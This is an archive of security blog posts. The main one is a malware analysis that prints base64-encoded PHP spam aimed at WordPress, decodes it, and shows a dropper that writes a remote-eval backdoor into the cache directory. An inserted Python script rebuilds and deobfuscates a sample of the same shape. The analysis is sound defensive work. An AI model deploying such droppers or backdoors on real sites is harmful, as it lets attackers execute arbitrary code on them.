Web Insecurity: JavaScript joys and other perils of the modern web, by Terri Oda (http://www.blogger.com/profile/10462169521890966235)<br />
<br />
<h1>Falling down the rabbit hole: An analysis of some questionable blog spam</h1>
(Terri Oda, 2013-05-06)<br />
<strong>WARNING: This entry contains some actual malicious code. I've HTML-escaped it so that it isn't going to get executed by you viewing it, but it was clearly intended to attack WordPress blogs, so if you're going to mess around with analyzing it, do it in a browser that's not logged in to any WordPress blog.</strong>
<br />
<br />
So I was clearing spam queues this morning, and came across a bunch of spam with this string in it:<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">eval(base64_decode(‘aWYoJGY9Zm9wZW4oJ3dw<wbr></wbr>LWNvbnRlbnQvY2FjaGUvaWZvb2FnLnBocCcsJ3cn<wbr></wbr>KSl7ZnB1dHMoJGYsJzw/cGhwIC8qTiVQYCUqL2V2<wbr></wbr>YWwvKklmXCcsLSovKC8qPjZgSGUqL2Jhc2U2NF9k<wbr></wbr>ZWNvZGUvKkBNKTIqLygvKn46SDUqL1wnTHlwM1ky<wbr></wbr>QTdjQ292YVdZdktuY2hibHNxTHlndktsNXpXeUZV<wbr></wbr>Y25CUktpOXBjM05sZEM4cVVFZzBPWHhBS2k4b0x5<wbr></wbr>cDRZR3BXS1U0cUx5UmZVa1ZSVlVWVFZDOHFjaUI0<wbr></wbr>S2k5Ykx5b29mbEZ4S2k4bll5Y3ZLakUvUUdWMFd5<wbr></wbr>b3ZMaThcJy8qT3pNNTIwKi8uLyo5SissKi9cJ3FQ<wbr></wbr>U3dwS2k4bmVpY3ZLblZVUVRrektpOHVMeXBEZTBj<wbr></wbr>NlFEUmNLaThuYkNjdktqaDBJRzhxTHk0dkttMTVU<wbr></wbr>VDA4UkdBcUx5ZDZKeThxZUdkbk1YWTJNU292TGk4<wbr></wbr>cVZuQkpaelFxTHlkNUp5OHFaWHhxZVVFcUx5NHZL<wbr></wbr>aXgyS0NvdkoyXCcvKnlBdCYqLy4vKkA1RHcmXU4q<wbr></wbr>L1wnd25MeXBHTFZGdlREUXFMMTB2S21KaGEwMHBL<wbr></wbr>aTh2S2x3N2MyNHFMeWt2S2s1M1Mwa25YeW92THlw<wbr></wbr>UFgyc3FMeWt2S2toQVlVczBWQ292WlhaaGJDOHFN<wbr></wbr>azU4TWpBK0tpOG9MeXBWYzBodFdWMWxXaW92YzNS<wbr></wbr>eWFYQnpiR0Z6YUdWekxcJy8qWWFiayovLi8qT35x<wbr></wbr>cyovXCd5bzhTR2N6S2k4b0x5cFZRVXRoWmlvdkpG<wbr></wbr>OVNSVkZWUlZOVUx5cFdMa3RVSUhzcUwxc3ZLa3N0<wbr></wbr>TG1NcUx5ZGpKeThxU0c5b0tpOHVMeXBZVGp0SEtp<wbr></wbr>OG5laWN2S2pzbU15Z3lNV1FtWFNvdkxpOHFPMUJQ<wbr></wbr>ZFNvdkoyd25MeXBaV1ZBelwnLyp7WUp9MSovLi8q<wbr></wbr>disoLTtrKi9cJ2VuVXFMeTR2S2xWc2FWVXRLaThu<wbr></wbr>ZW5sc0p5OHFSbFJaWERRcUwxMHZLazQvVW1JK0sy<wbr></wbr>WXFMeThxU3l0TFF5b3ZLUzhxYkVCcUtpOHZLbUpZ<wbr></wbr>UENvdktTOHFPbG8yVlVVb1NrSTRLaTh2S2tKWFp6<wbr></wbr>dEFTeW92T3k4cVJUc3JkaWRKS2k4PVwnLyooa0Nw<wbr></wbr>QFk+Ki8pLypgYmMqLy8qSHZeISovKS8qV21GKi8v<wbr></wbr>KlBfV2VgYD57Ki87LyotfGxURTEqLz8+Jyk7ZmNs<wbr></wbr>b3NlKCRmKTt9′));</span><br />
<br />
Or this clearly related one (note that the top of the string is the same):<br />
<code><br /><span style="font-family: Courier New, Courier, monospace;">aWYoJGY9Zm9wZW4oJ3dwLWNvbnRlbnQvY2FjaGUv<wbr></wbr>aWZvb2FnLnBocCcsJ3cnKSl7ZnB1dHMoJGYsJzw/c<wbr></wbr>GhwIC8qcGshV1UqL2V2YWwvKnpDRnI4ejQqLygvK<wbr></wbr>i1mJWYmZyovYmFzZTY0X2RlY29kZS8qY2hIIG0qL<wbr></wbr>ygvKnZXXnEqL1wnTHlvL05tcHlLaTlwWmk4cU9EN<wbr></wbr>UpUM2NxTHlndktsdHZLU292YVhOelpYUXZLa2M2W<wbr></wbr>TNRcUx5Z3ZLaUZQWERrcUx5UmZVa1ZSVlVWVFZDO<wbr></wbr>HFjU3R5S1RGNklDb3ZXeThxV0RkblNDb3ZcJy8qd<wbr></wbr>0VEJSovLi8qWnA2OnIqL1wnSjJNbkx5b2hSU0VxT<wbr></wbr>Hk0dktrZEVSU3RrS2k4bmVpY3ZLa2NyUUVZd09Db<wbr></wbr>3ZMaThxUFU5RUxqQTZUaW92SjJ3bkx5cDhkRE14U<wbr></wbr>kNvdkxpOHFLVFIwT2xoc2MyZ3FMeWQ2ZVd3bkx5c<wbr></wbr>FRcJy8qQ01MRzEqLy4vKmlUeVUwflAqL1wnVFZBd<wbr></wbr>FFTb3ZYUzhxSnpaUFR5MHFMeThxVFZOYlpDb3ZLU<wbr></wbr>zhxWEU1TU1Tb3ZMeXB1SjFzcUx5a3ZLaVZ5Y0N4a<wbr></wbr>EtpOWxkbUZzTHlwTkxseHBLaThvTHlwdFVtNDFJS<wbr></wbr>GxTS2k5emRISnBcJy8qXXgyZCovLi8qIG5SKi9cJ<wbr></wbr>2NITnNZWE5vWlhNdktrbytiRGhrS2k4b0x5bzFOa<wbr></wbr>3hZVTB0Z1RTb3ZKRjlTUlZGVlJWTlVMeXBPWGt0Y<wbr></wbr>VF6d3FMMXN2S201TWNrWXpjeUFxTHlkakp5OHFiQ<wbr></wbr>3RLY2lvdkxpOHFUUzFuXCcvKmhccGhpKi8uLypjV<wbr></wbr>z4qL1wnS2k4bmVpY3ZLaUZGTmlvdkxpOHFVeWRLU<wbr></wbr>VNvdkoyd25MeXB1S1ZWQUxpb3ZMaThxYkZoV1BEO<wbr></wbr>W9aU292SjNvbkx5cFZJRk1xTHk0dktqRkFlME1zS<wbr></wbr>2k4bmVTY3ZLajk4V3lvdkxpOHFcJy8qPE9rNXBmK<wbr></wbr>i8uLyo0VlhFKi9cJ1VtODJVeW92SjJ3bkx5cFZUR<wbr></wbr>m9xTDEwdktpWjNOQ292THlvL0xXWjVLaThwTHlvL<wbr></wbr>01URXFMeThxSjN4ZlFTb3ZLUzhxT2psSlRGSXFMe<wbr></wbr>ThxYjBNeFFTY3JKU292T3k4cWVWbzVUeW92XCcvK<wbr></wbr>iAzXCcqLykvKlpsWyUqLy8qLVRPJUdiNiovKS8qU<wbr></wbr>yw3bjRTLCovLypCQ1sqLzsvKkxacHM8blNaKi8/P<wbr></wbr>icpO2ZjbG9zZSgkZik7fQ==</span></code><br />
<br />
As you can tell from the first sample, it's base64 encoded... something. Base64 is pretty commonly used by attackers to obfuscate their code, so in case the spammy username and comment that went with the code weren't enough to tell me that something bad was intended, the base64 encoding itself would have been a clue. If I hadn't had the pretty huge hint of the base64_decode call, I might still have been able to figure it out from the format and from the fact that base64 uses = as padding (visible at the end of the second string).
<br />
<br />
Being a curious sort of person, I decoded the first string. In my case, I just opened up Python, and did this:<br />
<span style="font-family: Courier New, Courier, monospace;">>>> import base64</span><br />
<span style="font-family: Courier New, Courier, monospace;">>>> base64.b64decode(badstring1)</span><br />
<span style="font-family: Courier New, Courier, monospace;">"if($f=fopen('wp-content/cache/ifooag.php','w'))</span><br />
<span style="font-family: Courier New, Courier, monospace;">{fputs($f,'&lt;?php /*N%P`%*/eval/*If\\',-*/(/*>6`He*/base64_decode/*@M)2*/(/*~:H5*/</span><br />
<span style="font-family: Courier New, Courier, monospace;">\\'Lyp3Y2A7cCovaWYvKnchblsqLygvKl5zWyFUcnBRKi9pc</span><br />
<span style="font-family: Courier New, Courier, monospace;">3NldC8qUEg0OXxAKi8oLyp4YGpWKU4qLyRfUkVRVUVTVC8qc</span><br />
<span style="font-family: Courier New, Courier, monospace;">iB4Ki9bLyooflFxKi8nYycvKjE/QGV0WyovLi8\\'/*OzM52</span><br />
<span style="font-family: Courier New, Courier, monospace;">0*/./*9J+,*/\\'qPSwpKi8neicvKnVUQTkzKi8uLypDe0c6</span><br />
<span style="font-family: Courier New, Courier, monospace;">QDRcKi8nbCcvKjh0IG8qLy4vKm15TT08RGAqLyd6Jy8qeGdn</span><br />
<span style="font-family: Courier New, Courier, monospace;">MXY2MSovLi8qVnBJZzQqLyd5Jy8qZXxqeUEqLy4vKix2KCov</span><br />
<span style="font-family: Courier New, Courier, monospace;">J2\\'/*yAt&*/./*@5Dw&]N*/\\'wnLypGLVFvTD</span><br />
<span style="font-family: Courier New, Courier, monospace;">QqL10vKmJha00pKi8vKlw7c24qLykvKk53S0knXyovLypPX2</span><br />
<span style="font-family: Courier New, Courier, monospace;">sqLykvKkhAYUs0VCovZXZhbC8qMk58MjA+Ki8oLypVc0htWV</span><br />
<span style="font-family: Courier New, Courier, monospace;">1lWiovc3RyaXBzbGFzaGVzL\\'/*Yabk*/./*O~qs*/\\'yo</span><br />
<span style="font-family: Courier New, Courier, monospace;">8SGczKi8oLypVQUthZiovJF9SRVFVRVNULypWLktUIHsqL1s</span><br />
<span style="font-family: Courier New, Courier, monospace;">vKkstLmMqLydjJy8qSG9oKi8uLypYTjtHKi8neicvKjsmMyg</span><br />
<span style="font-family: Courier New, Courier, monospace;">yMWQmXSovLi8qO1BPdSovJ2wnLypZWVAz\\'/*{YJ}1*/./*v+(-;k*/\\'enUqLy4vKlVsaVUtKi8nenlsJy8qRlRZXDQqL10vK</span><br />
<span style="font-family: Courier New, Courier, monospace;">k4/UmI+K2YqLy8qSytLQyovKS8qbEBqKi8vKmJYPCovKS8qO</span><br />
<span style="font-family: Courier New, Courier, monospace;">lo2VUUoSkI4Ki8vKkJXZztASyovOy8qRTsrdidJKi8=\\'/*(kCp@Y>*/)/*`bc*//*Hv^!*/)/*WmF*//*P_We``></span><br />
<span style="font-family: Courier New, Courier, monospace;">{*/;/*-|lTE1*/?>');fclose($f);}"</span><br />
<br />
<br />
(Well, okay, I actually ran <code>cgi.escape(base64.b64decode(badstring1))</code> to get the version you're seeing in the blog post, since I wanted to make sure none of that was executed, but that's not relevant to the code analysis, just useful if you're talking about code on the internet.)
<br />
<br />
So that still looks pretty obfuscated, and even more full of base64 (yo, I heard you like base64 so I put some base64 in your base64). But we've learned a new thing: the code is trying to open up a file in the WordPress cache called ifooag.php, under wp-content, which is a directory WordPress needs to have write access to. I did a quick web search for that filename and found a bunch of spam, so my bet is that they're creating a new file rather than modifying an existing one. And we can tell that they're trying to put some PHP into that file because of the <code>&lt;?php</code> and <code>?&gt;</code>, which are the character sequences that tell the server to run some PHP code.
<br />
<br />
But that code? Still looks pretty much like gobbledegook.
<br />
<br />
If you know a bit about PHP, you'll know that it accepts C-style comments delimited by /* and */, so we can remove those from the PHP code to get something a bit easier to parse:<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">eval(base64_decode(\\'Lyp3Y2A7cCovaWYvKn<wbr></wbr>chblsqLygvKl5zWyFUcnBRKi9pc3NldC8qUEg0OX<wbr></wbr>xAKi8oLyp4YGpWKU4qLyRfUkVRVUVTVC8qciB4Ki<wbr></wbr>9bLyooflFxKi8nYycvKjE/QGV0WyovLi8\\'.\\'q<wbr></wbr>PSwpKi8neicvKnVUQTkzKi8uLypDe0c6QDRcKi8n<wbr></wbr>bCcvKjh0IG8qLy4vKm15TT08RGAqLyd6Jy8qeGdn<wbr></wbr>MXY2MSovLi8qVnBJZzQqLyd5Jy8qZXxqeUEqLy4v<wbr></wbr>Kix2KCovJ2\\'.\\'wnLypGLVFvTDQqL10vKmJha<wbr></wbr>00pKi8vKlw7c24qLykvKk53S0knXyovLypPX2sqL<wbr></wbr>ykvKkhAYUs0VCovZXZhbC8qMk58MjA+Ki8oLypVc<wbr></wbr>0htWV1lWiovc3RyaXBzbGFzaGVzL\\'.\\'yo8SG<wbr></wbr>czKi8oLypVQUthZiovJF9SRVFVRVNULypWLktUIH<wbr></wbr>sqL1svKkstLmMqLydjJy8qSG9oKi8uLypYTjtHKi<wbr></wbr>8neicvKjsmMygyMWQmXSovLi8qO1BPdSovJ2wnLy<wbr></wbr>pZWVAz\\'.\\'enUqLy4vKlVsaVUtKi8nenlsJy8<wbr></wbr>qRlRZXDQqL10vKk4/UmI+K2YqLy8qSytLQyovKS8<wbr></wbr>qbEBqKi8vKmJYPCovKS8qOlo2VUUoSkI4Ki8vKkJ<wbr></wbr>XZztASyovOy8qRTsrdidJKi8=\\'));</span><br />
<br />
Feel like we're going in circles? Yup, that's another base64 encoded string. So let's take out the quotes and the concatenations to see what that is:<br />
<br />
<code><br /><span style="font-family: Courier New, Courier, monospace;">Lyp3Y2A7cCovaWYvKnchblsqLygvKl5zWyFUcnBR<wbr></wbr>Ki9pc3NldC8qUEg0OXxAKi8oLyp4YGpWKU4qLyRf<wbr></wbr>UkVRVUVTVC8qciB4Ki9bLyooflFxKi8nYycvKjE/Q<wbr></wbr>GV0WyovLi8qPSwpKi8neicvKnVUQTkzKi8uLypDe<wbr></wbr>0c6QDRcKi8nbCcvKjh0IG8qLy4vKm15TT08RGAqL<wbr></wbr>yd6Jy8qeGdnMXY2MSovLi8qVnBJZzQqLyd5Jy8qZ<wbr></wbr>XxqeUEqLy4vKix2KCovJ2wnLypGLVFvTDQqL10vK<wbr></wbr>mJha00pKi8vKlw7c24qLykvKk53S0knXyovLypPX<wbr></wbr>2sqLykvKkhAYUs0VCovZXZhbC8qMk58MjA+Ki8oL<wbr></wbr>ypVc0htWV1lWiovc3RyaXBzbGFzaGVzLyo8SGczK<wbr></wbr>i8oLypVQUthZiovJF9SRVFVRVNULypWLktUIHsqL<wbr></wbr>1svKkstLmMqLydjJy8qSG9oKi8uLypYTjtHKi8ne<wbr></wbr>icvKjsmMygyMWQmXSovLi8qO1BPdSovJ2wnLypZW<wbr></wbr>VAzenUqLy4vKlVsaVUtKi8nenlsJy8qRlRZXDQqL<wbr></wbr>10vKk4/UmI+K2YqLy8qSytLQyovKS8qbEBqKi8vK<wbr></wbr>mJYPCovKS8qOlo2VUUoSkI4Ki8vKkJXZztASyovO<wbr></wbr>y8qRTsrdidJKi8=</span></code><br />
<br />
You might think we're getting close now, but here's what you get out of decoding that:<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">>>> base64.b64decode(badstring1a)</span><br />
<code><span style="font-family: Courier New, Courier, monospace;">"/*wc`;p*/if/*w!n[*/(/*^s[!TrpQ*/isset/*PH49|@*/(/*x`jV)N*/$_REQUEST/*r x*/[/*(~Qq*/'c'/*1?@et[*/./*=,)*/'z'/*uTA93*/./*C{G:@4\\*/'l'/*8t o*/./*myM=&lt;D`*/'z'/*xgg1v61*/./*VpIg4*/'y'/*e|jyA*/./*,v(*/'l'/*F-QoL4*/]/*bakM)*//*\\;sn*/)/*NwKI'_*//*O_k*/)/*H@aK4T*/eval/*2N|20>*/(/*UsHmY]eZ*/stripslashes/*&lt;Hg3*/(/*UAKaf*/$_REQUEST/*V.KT {*/[/*K-.c*/'c'/*Hoh*/./*XN;G*/'z'/*;&3(21d&]*/./*;POu*/'l'/*YYP3zu*/./*UliU-*/'zyl'/*FTY\\4*/]/*N?Rb>+f*//*K+KC*/)/*l@j*//*bX&lt;*/)/*:Z6UE(JB8*//*BWg;@K*/;/*E;+v'I*/"</span></code><br />
<br />
Yup, definitely going in circles. But at least we know what to do: get rid of the comments again.
<br />
<br />
<br />
Incidentally, I'm just using a simple regular expression to do this: <code><span style="font-family: Courier New, Courier, monospace;">s/\/\*[^*]*\*\///g</span></code>. That's not robust against all possible nestings or whatnot, but it's good enough for simple analysis. I actually execute it in vim as <code><span style="font-family: Courier New, Courier, monospace;">:%s/\/\*[^*]*\*\///gc</span></code> and then check each piece as I'm removing it.<br />
<br />
<br />
Here's what it looks like without the comments:<br />
<code><span style="font-family: Courier New, Courier, monospace;">if(isset($_REQUEST['c'.'z'.'l'.'z'.'y'.'l'<wbr></wbr>]))eval(stripslashes($_REQUEST['c'.'z'.'l'<wbr></wbr>.'zyl']));</span></code><br />
So let's stick together those concatenated strings again:
<br />
<code><span style="font-family: Courier New, Courier, monospace;">if(isset($_REQUEST['czlzyl']))eval(strip<wbr></wbr>slashes($_REQUEST['czlzyl']));</span></code><br />
<br />
Okay, so now it's added a small piece of PHP to a file in the WordPress cache directory that is basically just waiting for some outside entity to provide code, which will then be executed. That's actually pretty interesting: it's not fully executing the malicious payload now; it's waiting for an outside request. Is this to foil scanners that are wise to the type of things spammers add to blogs, or is this in preparation for a big attack that could be launched all at once, once the machines are prepared?<br />
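The manual unpeeling above (strip the comments, glue the split string literals back together, base64-decode, repeat) is easy to automate. The following Python 3 script is an added example, not code from the post: it works on a sample constructed here in the same shape as the spam (the real strings are quoted above, and the filename and parameter name are the ones the post found) and peels it down to the same two-parameter one-liner.

```python
import base64
import re

# The three obfuscation tricks the post peels by hand:
#   1. junk C-style comments everywhere:           /*N%P`%*/
#   2. string literals split and re-concatenated:   'c'/*x*/./*y*/'z'
#   3. a payload wrapped in eval(base64_decode('...')), nested twice
COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
CONCAT_RE = re.compile(r"'([^'\\]*)'\s*\.\s*'([^'\\]*)'")
B64_CALL_RE = re.compile(r"base64_decode\s*\(\s*'([A-Za-z0-9+/=]+)'\s*\)")
REQUEST_KEY_RE = re.compile(r"\$_REQUEST\s*\[\s*'([^']*)'\s*\]")


def strip_comments(php):
    # Non-greedy and DOTALL: unlike the post's [^*]* vim pattern, this also
    # removes a comment that happens to contain a lone '*' in its body.
    return COMMENT_RE.sub("", php)


def join_literals(php):
    # Glue 'a'.'b' back into 'ab'; loop so 'c'.'z'.'l' collapses fully.
    while True:
        joined = CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", php)
        if joined == php:
            return joined
        php = joined


def normalise(php):
    # \' appears wherever the payload was embedded in a single-quoted PHP
    # string (the fputs() dropper); undo that first, like stripslashes().
    return join_literals(strip_comments(php.replace("\\'", "'")))


def peel(blob, max_layers=10):
    """Clean up, then decode the next base64_decode('...') argument; repeat.

    Returns (layers, final): the cleaned-up text at each depth and the
    innermost code, which no longer contains a base64_decode() call.
    """
    layers = []
    code = blob
    for _ in range(max_layers):
        code = normalise(code)
        layers.append(code)
        match = B64_CALL_RE.search(code)
        if not match:
            break
        code = base64.b64decode(match.group(1)).decode("latin-1")
    return layers, layers[-1]


def request_keys(php):
    """Names of the $_REQUEST parameters the code reads: the backdoor's trigger."""
    return sorted(set(REQUEST_KEY_RE.findall(php)))


# --- Constructed sample (not the post's actual string) in the same shape:
# the one-liner, inside a base64 layer whose literal is chopped up by
# comments, inside the fputs() dropper, base64-wrapped as it arrived.
def _b64(text):
    return base64.b64encode(text.encode()).decode()


def _chopped_literal(b64, size=40):
    chunks = [b64[i:i + size] for i in range(0, len(b64), size)]
    return "/*OzM52*/./*9J+,*/".join("'" + c + "'" for c in chunks)


LAYER2 = ("/*wc`;p*/if/*w!n[*/(/*^s[!TrpQ*/isset(/*x`jV)N*/$_REQUEST/*r x*/[/*(~Qq*/'c'"
          "/*1?@et[*/./*=,)*/'z'/*uTA93*/./*C{G:@4*/'l'.'z'.'y'.'l']))"
          "eval/*2N|20>*/(stripslashes($_REQUEST['c'.'z'.'l'/*YYP3zu*/./*UliU-*/'zyl']));")
LAYER1 = ("eval/*If',-*/(/*>6`He*/base64_decode/*@M)2*/(" + _chopped_literal(_b64(LAYER2))
          + "));")
DROPPER = ("if($f=fopen('wp-content/cache/ifooag.php','w')){fputs($f,'<?php "
           + LAYER1.replace("'", "\\'") + "?>');fclose($f);}")
SPAM = "eval(base64_decode('" + _b64(DROPPER) + "'));"

if __name__ == "__main__":
    layers, final = peel(SPAM)
    for depth, text in enumerate(layers):
        print(f"--- layer {depth} ---\n{text[:120]}{'...' if len(text) > 120 else ''}")
    print("trigger parameter(s):", request_keys(final))
```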
<br />
It's going to be a request that starts like this:<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">http://EXAMPLE.COM/wp-content/cache/ifooag.php?czlzyl=</span><br />
<br />
Unfortunately, I don't have access to the logs for the particular site I saw this on, so my analysis stops here and I can't tell you exactly what it was going to try to execute, but I think it's pretty safe to say that it wouldn't have been good. I <em>can</em> tell you that there is no such file on the server in question and, indeed, the code doesn't seem to have been executed since it got caught in the spam queue and discarded by me.
<br />
<br />
But if you've ever had a site compromised and wondered how it might have been done, now you know a whole lot more about the way it could have happened. All I can really suggest is that spam blocking is important (these comments were caught by Akismet) and that if you can turn off JavaScript while you're moderating comments, that might be the safest possible thing to do, even though it makes using WordPress a little more kludgy and annoying. Thankfully it doesn't render it unusable!
<br />
<br />
Meanwhile, want to try your own hand at analyzing code? I only went through the full decoding for the first of the two strings I gave at the top of this post, but I imagine the second one is very similar to the first, so I leave it as an exercise to the reader. Happy hacking!<br />
<br />
<h1>Should you really change your re-used passwords after a breach? Maybe not.</h1>
(Terri Oda, 2012-07-12)<br />
<a href="http://www.flickr.com/photos/mrzeon/5330056727/" title="Dice by Daniel Dionne, on Flickr"><img align="right" alt="Dice" height="160" src="https://farm6.staticflickr.com/5206/5330056727_a98c97c3c5_m.jpg" style="padding: 10px;" width="240" /></a>The news is reporting that <a href="http://arstechnica.com/security/2012/07/yahoo-service-hacked/">453,000 credentials were allegedly taken from Yahoo</a>, and current reports say that it's probably Yahoo Voice that was compromised. If you want to know if yours is in there, it seems like the hacker website is overwhelmed at the moment, but you can <a href="http://dazzlepod.com/yahoo/">search for your username/email</a> here on a sanitized list that doesn't include the passwords.
<br />
<br />
Probably unsurprisingly, the next bit of news is that people haven't changed their hacked passwords from previous breaches. To wit, <a href="http://www.troyhunt.com/2012/07/what-do-sony-and-yahoo-have-in-common.html">59% of people were re-using the passwords that had previously been hacked and released to the public in the Sony breach</a>. Which seems a bit high given the publicity, but I'm not as surprised as I maybe should be.<br />
<br />
<b>What I'd really like to know is how many of those people actually suffered from this password re-use.</b> Did anyone bother to try re-using their credentials?<br />
<br />
I'm reminded of one of my favourite security papers, "<a href="http://research.microsoft.com/users/cormac/papers/2009/SoLongAndNoThanks.pdf">So Long, and No Thanks for the Externalities: the Rational Rejection of Security Advice by Users</a>," by Cormac Herley. In it, he claims that many security "best" practices like changing passwords frequently are actually a waste of time for the average user, when you take into account the risks involved. <br />
<br />
So, is changing a password after a breach one of those things that we can skip without much incident? Sadly, I don't have any definitive way to analyze how many folk were inconvenienced by their password reuse in the Sony and subsequent Yahoo breaches, but I can make a guess: If those accounts were compromised on Yahoo after the Sony breach, we'd be seeing a lot more people changing their passwords between the two. So probably at least those 59% were not inconvenienced enough to change their passwords subsequent to the breach. That's a lot of people.<br />
<br />
Of course, it's possible that the accounts were breached and used in a way that the owner never noticed. But if they're not noticing, are they really being inconvenienced? Probably in a global sense (i.e. spam) but maybe not in a short-term decision-making sense. Of course, we could assume that the alleged hack is a hoax using many of the previously hacked passwords from Sony, but given how easy it is to compromise web apps I'm currently assuming that the hack itself is a real thing. In which case, that's a lot of no-change. It looks suspiciously like you're likely to be more inconvenienced taking the time to change your password than you would if you did nothing, statistically speaking.<br />
<b>So, should you change your password after a breach? It depends on how much you feel like rolling the dice.</b> Failing to change their breached passwords doesn't seem to have hurt that many of the Yahoo Voice denizens, but with numbers on re-used passwords hitting the news today, it's possible we'll see more people trying this avenue of attack in the future. Still, rather than assuming those 59% are foolish for keeping the same credentials, it's worth considering that they might have just been savvy gamblers, this time.<br />
<br />
<h1>Apparently consumers do care about privacy</h1>
(Terri Oda, 2012-03-28)<br />
I often get into discussions about whether people really do care about privacy, given that they give away personal information regularly when they share with friends via Facebook or other services. A recent report suggests that people <em>do</em> care, at least when it comes to banking and shopping:<br />
<br />
<blockquote>The <a href="http://datasecurity.edelman.com/wp-content/uploads/2012/03/Data-Security-Privacy-Executive-Summary.pdf">Edelman study</a> released in February 2012 shows that consumer concerns about data privacy and security are actively diminishing their trust in organizations. For instance, 92% listed data security and privacy as important considerations for financial institutions, but only 69% actually trusted financial institutions to adequately protect their personal information. An even sharper disconnect can be seen with online retailers, with 84% naming security of personal information as a priority but only 33% trusting online retailers to protect it.</blockquote><br />
The blog of the Office of the Canadian Privacy Commissioner (from which I drew this quote) sums it up in the title: <a href="http://blog.privcom.gc.ca/index.php/2012/03/27/privacy-not-just-good-business-but-good-for-business/">Privacy: Not just good business, but good for business</a>.<br />
<br />
But I have to wonder, do these numbers indicate that privacy-preserving businesses will be winning customers, or will we simply see <em>claims</em> of privacy that aren't backed up by carefully constructed systems? Do consumers really care about privacy or do they just say they care? How will consumers evaluate potentially spurious privacy claims? In Canada we at least have the privacy commissioner who brings issues to light, and worldwide we have the <a href="https://www.eff.org/">Electronic Frontier Foundation</a>, but while both organizations are astute and do their best, privacy claims are something that will need to be evaluated by organizations like Consumer Reports that are used by consumers when making decisions about where they spend and keep their money. Right now, by and large, we only hear about the relative privacy of an organization when a breach occurs.<br />
<br />
I attended a talk on Internet voting yesterday and the speaker quoted an official in DC who claimed that, "voters like internet voting, so it must be secure," which is really quite a terrifying quote if you think about it. The speaker joked, "does this mean that because my kid likes cake, it must be healthy?" It really clearly demonstrates first that users of the system have very little understanding of its safety (despite strides in the area, internet voting as currently implemented is rarely secure), but also that officials who roll out such systems have little understanding of the flaws of the system and are much too willing to overlook them for convenience's sake. If this is the case with voting, it's hard to believe that business would avoid such cognitive mistakes.<br />
<br />
<h1>Andrew Tanenbaum on Security vs Fun-Loving Students</h1>
(Terri Oda, 2012-02-07)<br />
<blockquote>... "some modicum of security was required to prevent fun-loving students from spoofing routers by sending them false routing information."<br />
</blockquote><br />
- Andrew S. Tanenbaum regarding OSPF in <em>Computer Networks (4th ed.)</em><br />
<br />
<h1>On the Subject of Privacy and Pants...</h1>
(Terri Oda, 2011-09-26)<br />
I was proofreading a privacy paper this afternoon and came across the funniest typo. I feel it is funnier if I illustrate it so that you too can see what popped into my head when I read it:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRXzY8hP4fRpM0brxQgJi_pefxIdVhyzOTWap8dvt3iUepVShcameZMMmZTnJ_-Py0Npeta1g4-k_8qhaQA8QNOLVTDmUzm_vMfvRNJPPW5r9Ncd3niUU370DFGFS-HKZFC4vqCiKKma4/s1600/privacybreeches.jpg" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="292" width="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRXzY8hP4fRpM0brxQgJi_pefxIdVhyzOTWap8dvt3iUepVShcameZMMmZTnJ_-Py0Npeta1g4-k_8qhaQA8QNOLVTDmUzm_vMfvRNJPPW5r9Ncd3niUU370DFGFS-HKZFC4vqCiKKma4/s400/privacybreeches.jpg" /></a></div><br />
(<a href="http://www.flickr.com/photos/cnewtoncom/467778980/">Photo by cnewtoncom</a>. For geek points, guess whose famous pants those are without clicking the link!)<br />
<br />
Privacy breeches are much funnier than privacy breaches. <br />
<br />
I'm not going to be able to get dressed tomorrow without laughing at my privacy-preserving pants. One could argue, perhaps, that the function of many pants is to provide basic privacy... but I leave the finding of non privacy-preserving pants as an exercise to the reader. And though it is a bit tempting to run a contest for the best illustration of a privacy breech breach, I imagine it would get not safe for work very quickly!<br />
<br />
<h1>I admit, I laughed: LulzSec as popular as orgasms?</h1>
(Terri Oda, 2011-06-24)<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEAOVFYnjuWB0rHQH_R9gBmPSVzOxUeETMjuNZ5Fr8CAVIS4hgOSDvnU8klcY28nT0RJl2bPclBrVUzxfDKmxwyPHhmglgiTdN1rKl2wRfWPFFnGotH0NeFiChFoZZjZ-lVd1lNvIXeTA/s1600/somehwat-mad-completely-mad-u-mad-MADAD_reasonably_small.jpg" imageanchor="1" style="clear:right; float:right; margin-left:1em; margin-bottom:1em"><img border="0" height="128" width="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEAOVFYnjuWB0rHQH_R9gBmPSVzOxUeETMjuNZ5Fr8CAVIS4hgOSDvnU8klcY28nT0RJl2bPclBrVUzxfDKmxwyPHhmglgiTdN1rKl2wRfWPFFnGotH0NeFiChFoZZjZ-lVd1lNvIXeTA/s400/somehwat-mad-completely-mad-u-mad-MADAD_reasonably_small.jpg" /></a></div>Unless you've been ignoring the news for the past few weeks, you've probably seen mention of <a href="https://twitter.com/lulzsec">LulzSec</a>, and if you're a security person you've probably seen this article about <a href="http://risky.biz/lulzsec">Why [security folk] secretly love LulzSec</a>. The short version is that they're the latest hacker gang, and rather than profit or social justice, they're just in it <a href="http://www.urbandictionary.com/define.php?term=lulz">for the lulz</a>. 
They're really making the state of computer security more obvious to the layperson:<br />
<br />
<blockquote>LulzSec is running around pummelling some of the world's most powerful organisations into the ground... for laughs! For lulz! For shits and giggles! Surely that tells you what you need to know about computer security: there isn't any.</blockquote><br />
While I often joke that web security is an oxymoron, they demonstrate it in the funniest ways they can find. As a web security researcher, I have to admit that their antics often make me laugh... and kinda make me wish I was allowed to use stolen data for research -- all those passwords! Data was always hard to come by when I did my spam immune system work so that much just makes me salivate a little, even if I'm pretty sure our ethics committee wouldn't let me touch it. And it's not like I do authentication research. But still! Data! <a href="http://www.skullsecurity.org/blog/2011/ethics-of-password-crackingdissemination">I hope someone's doing cool things with it</a>.<br />
<br />
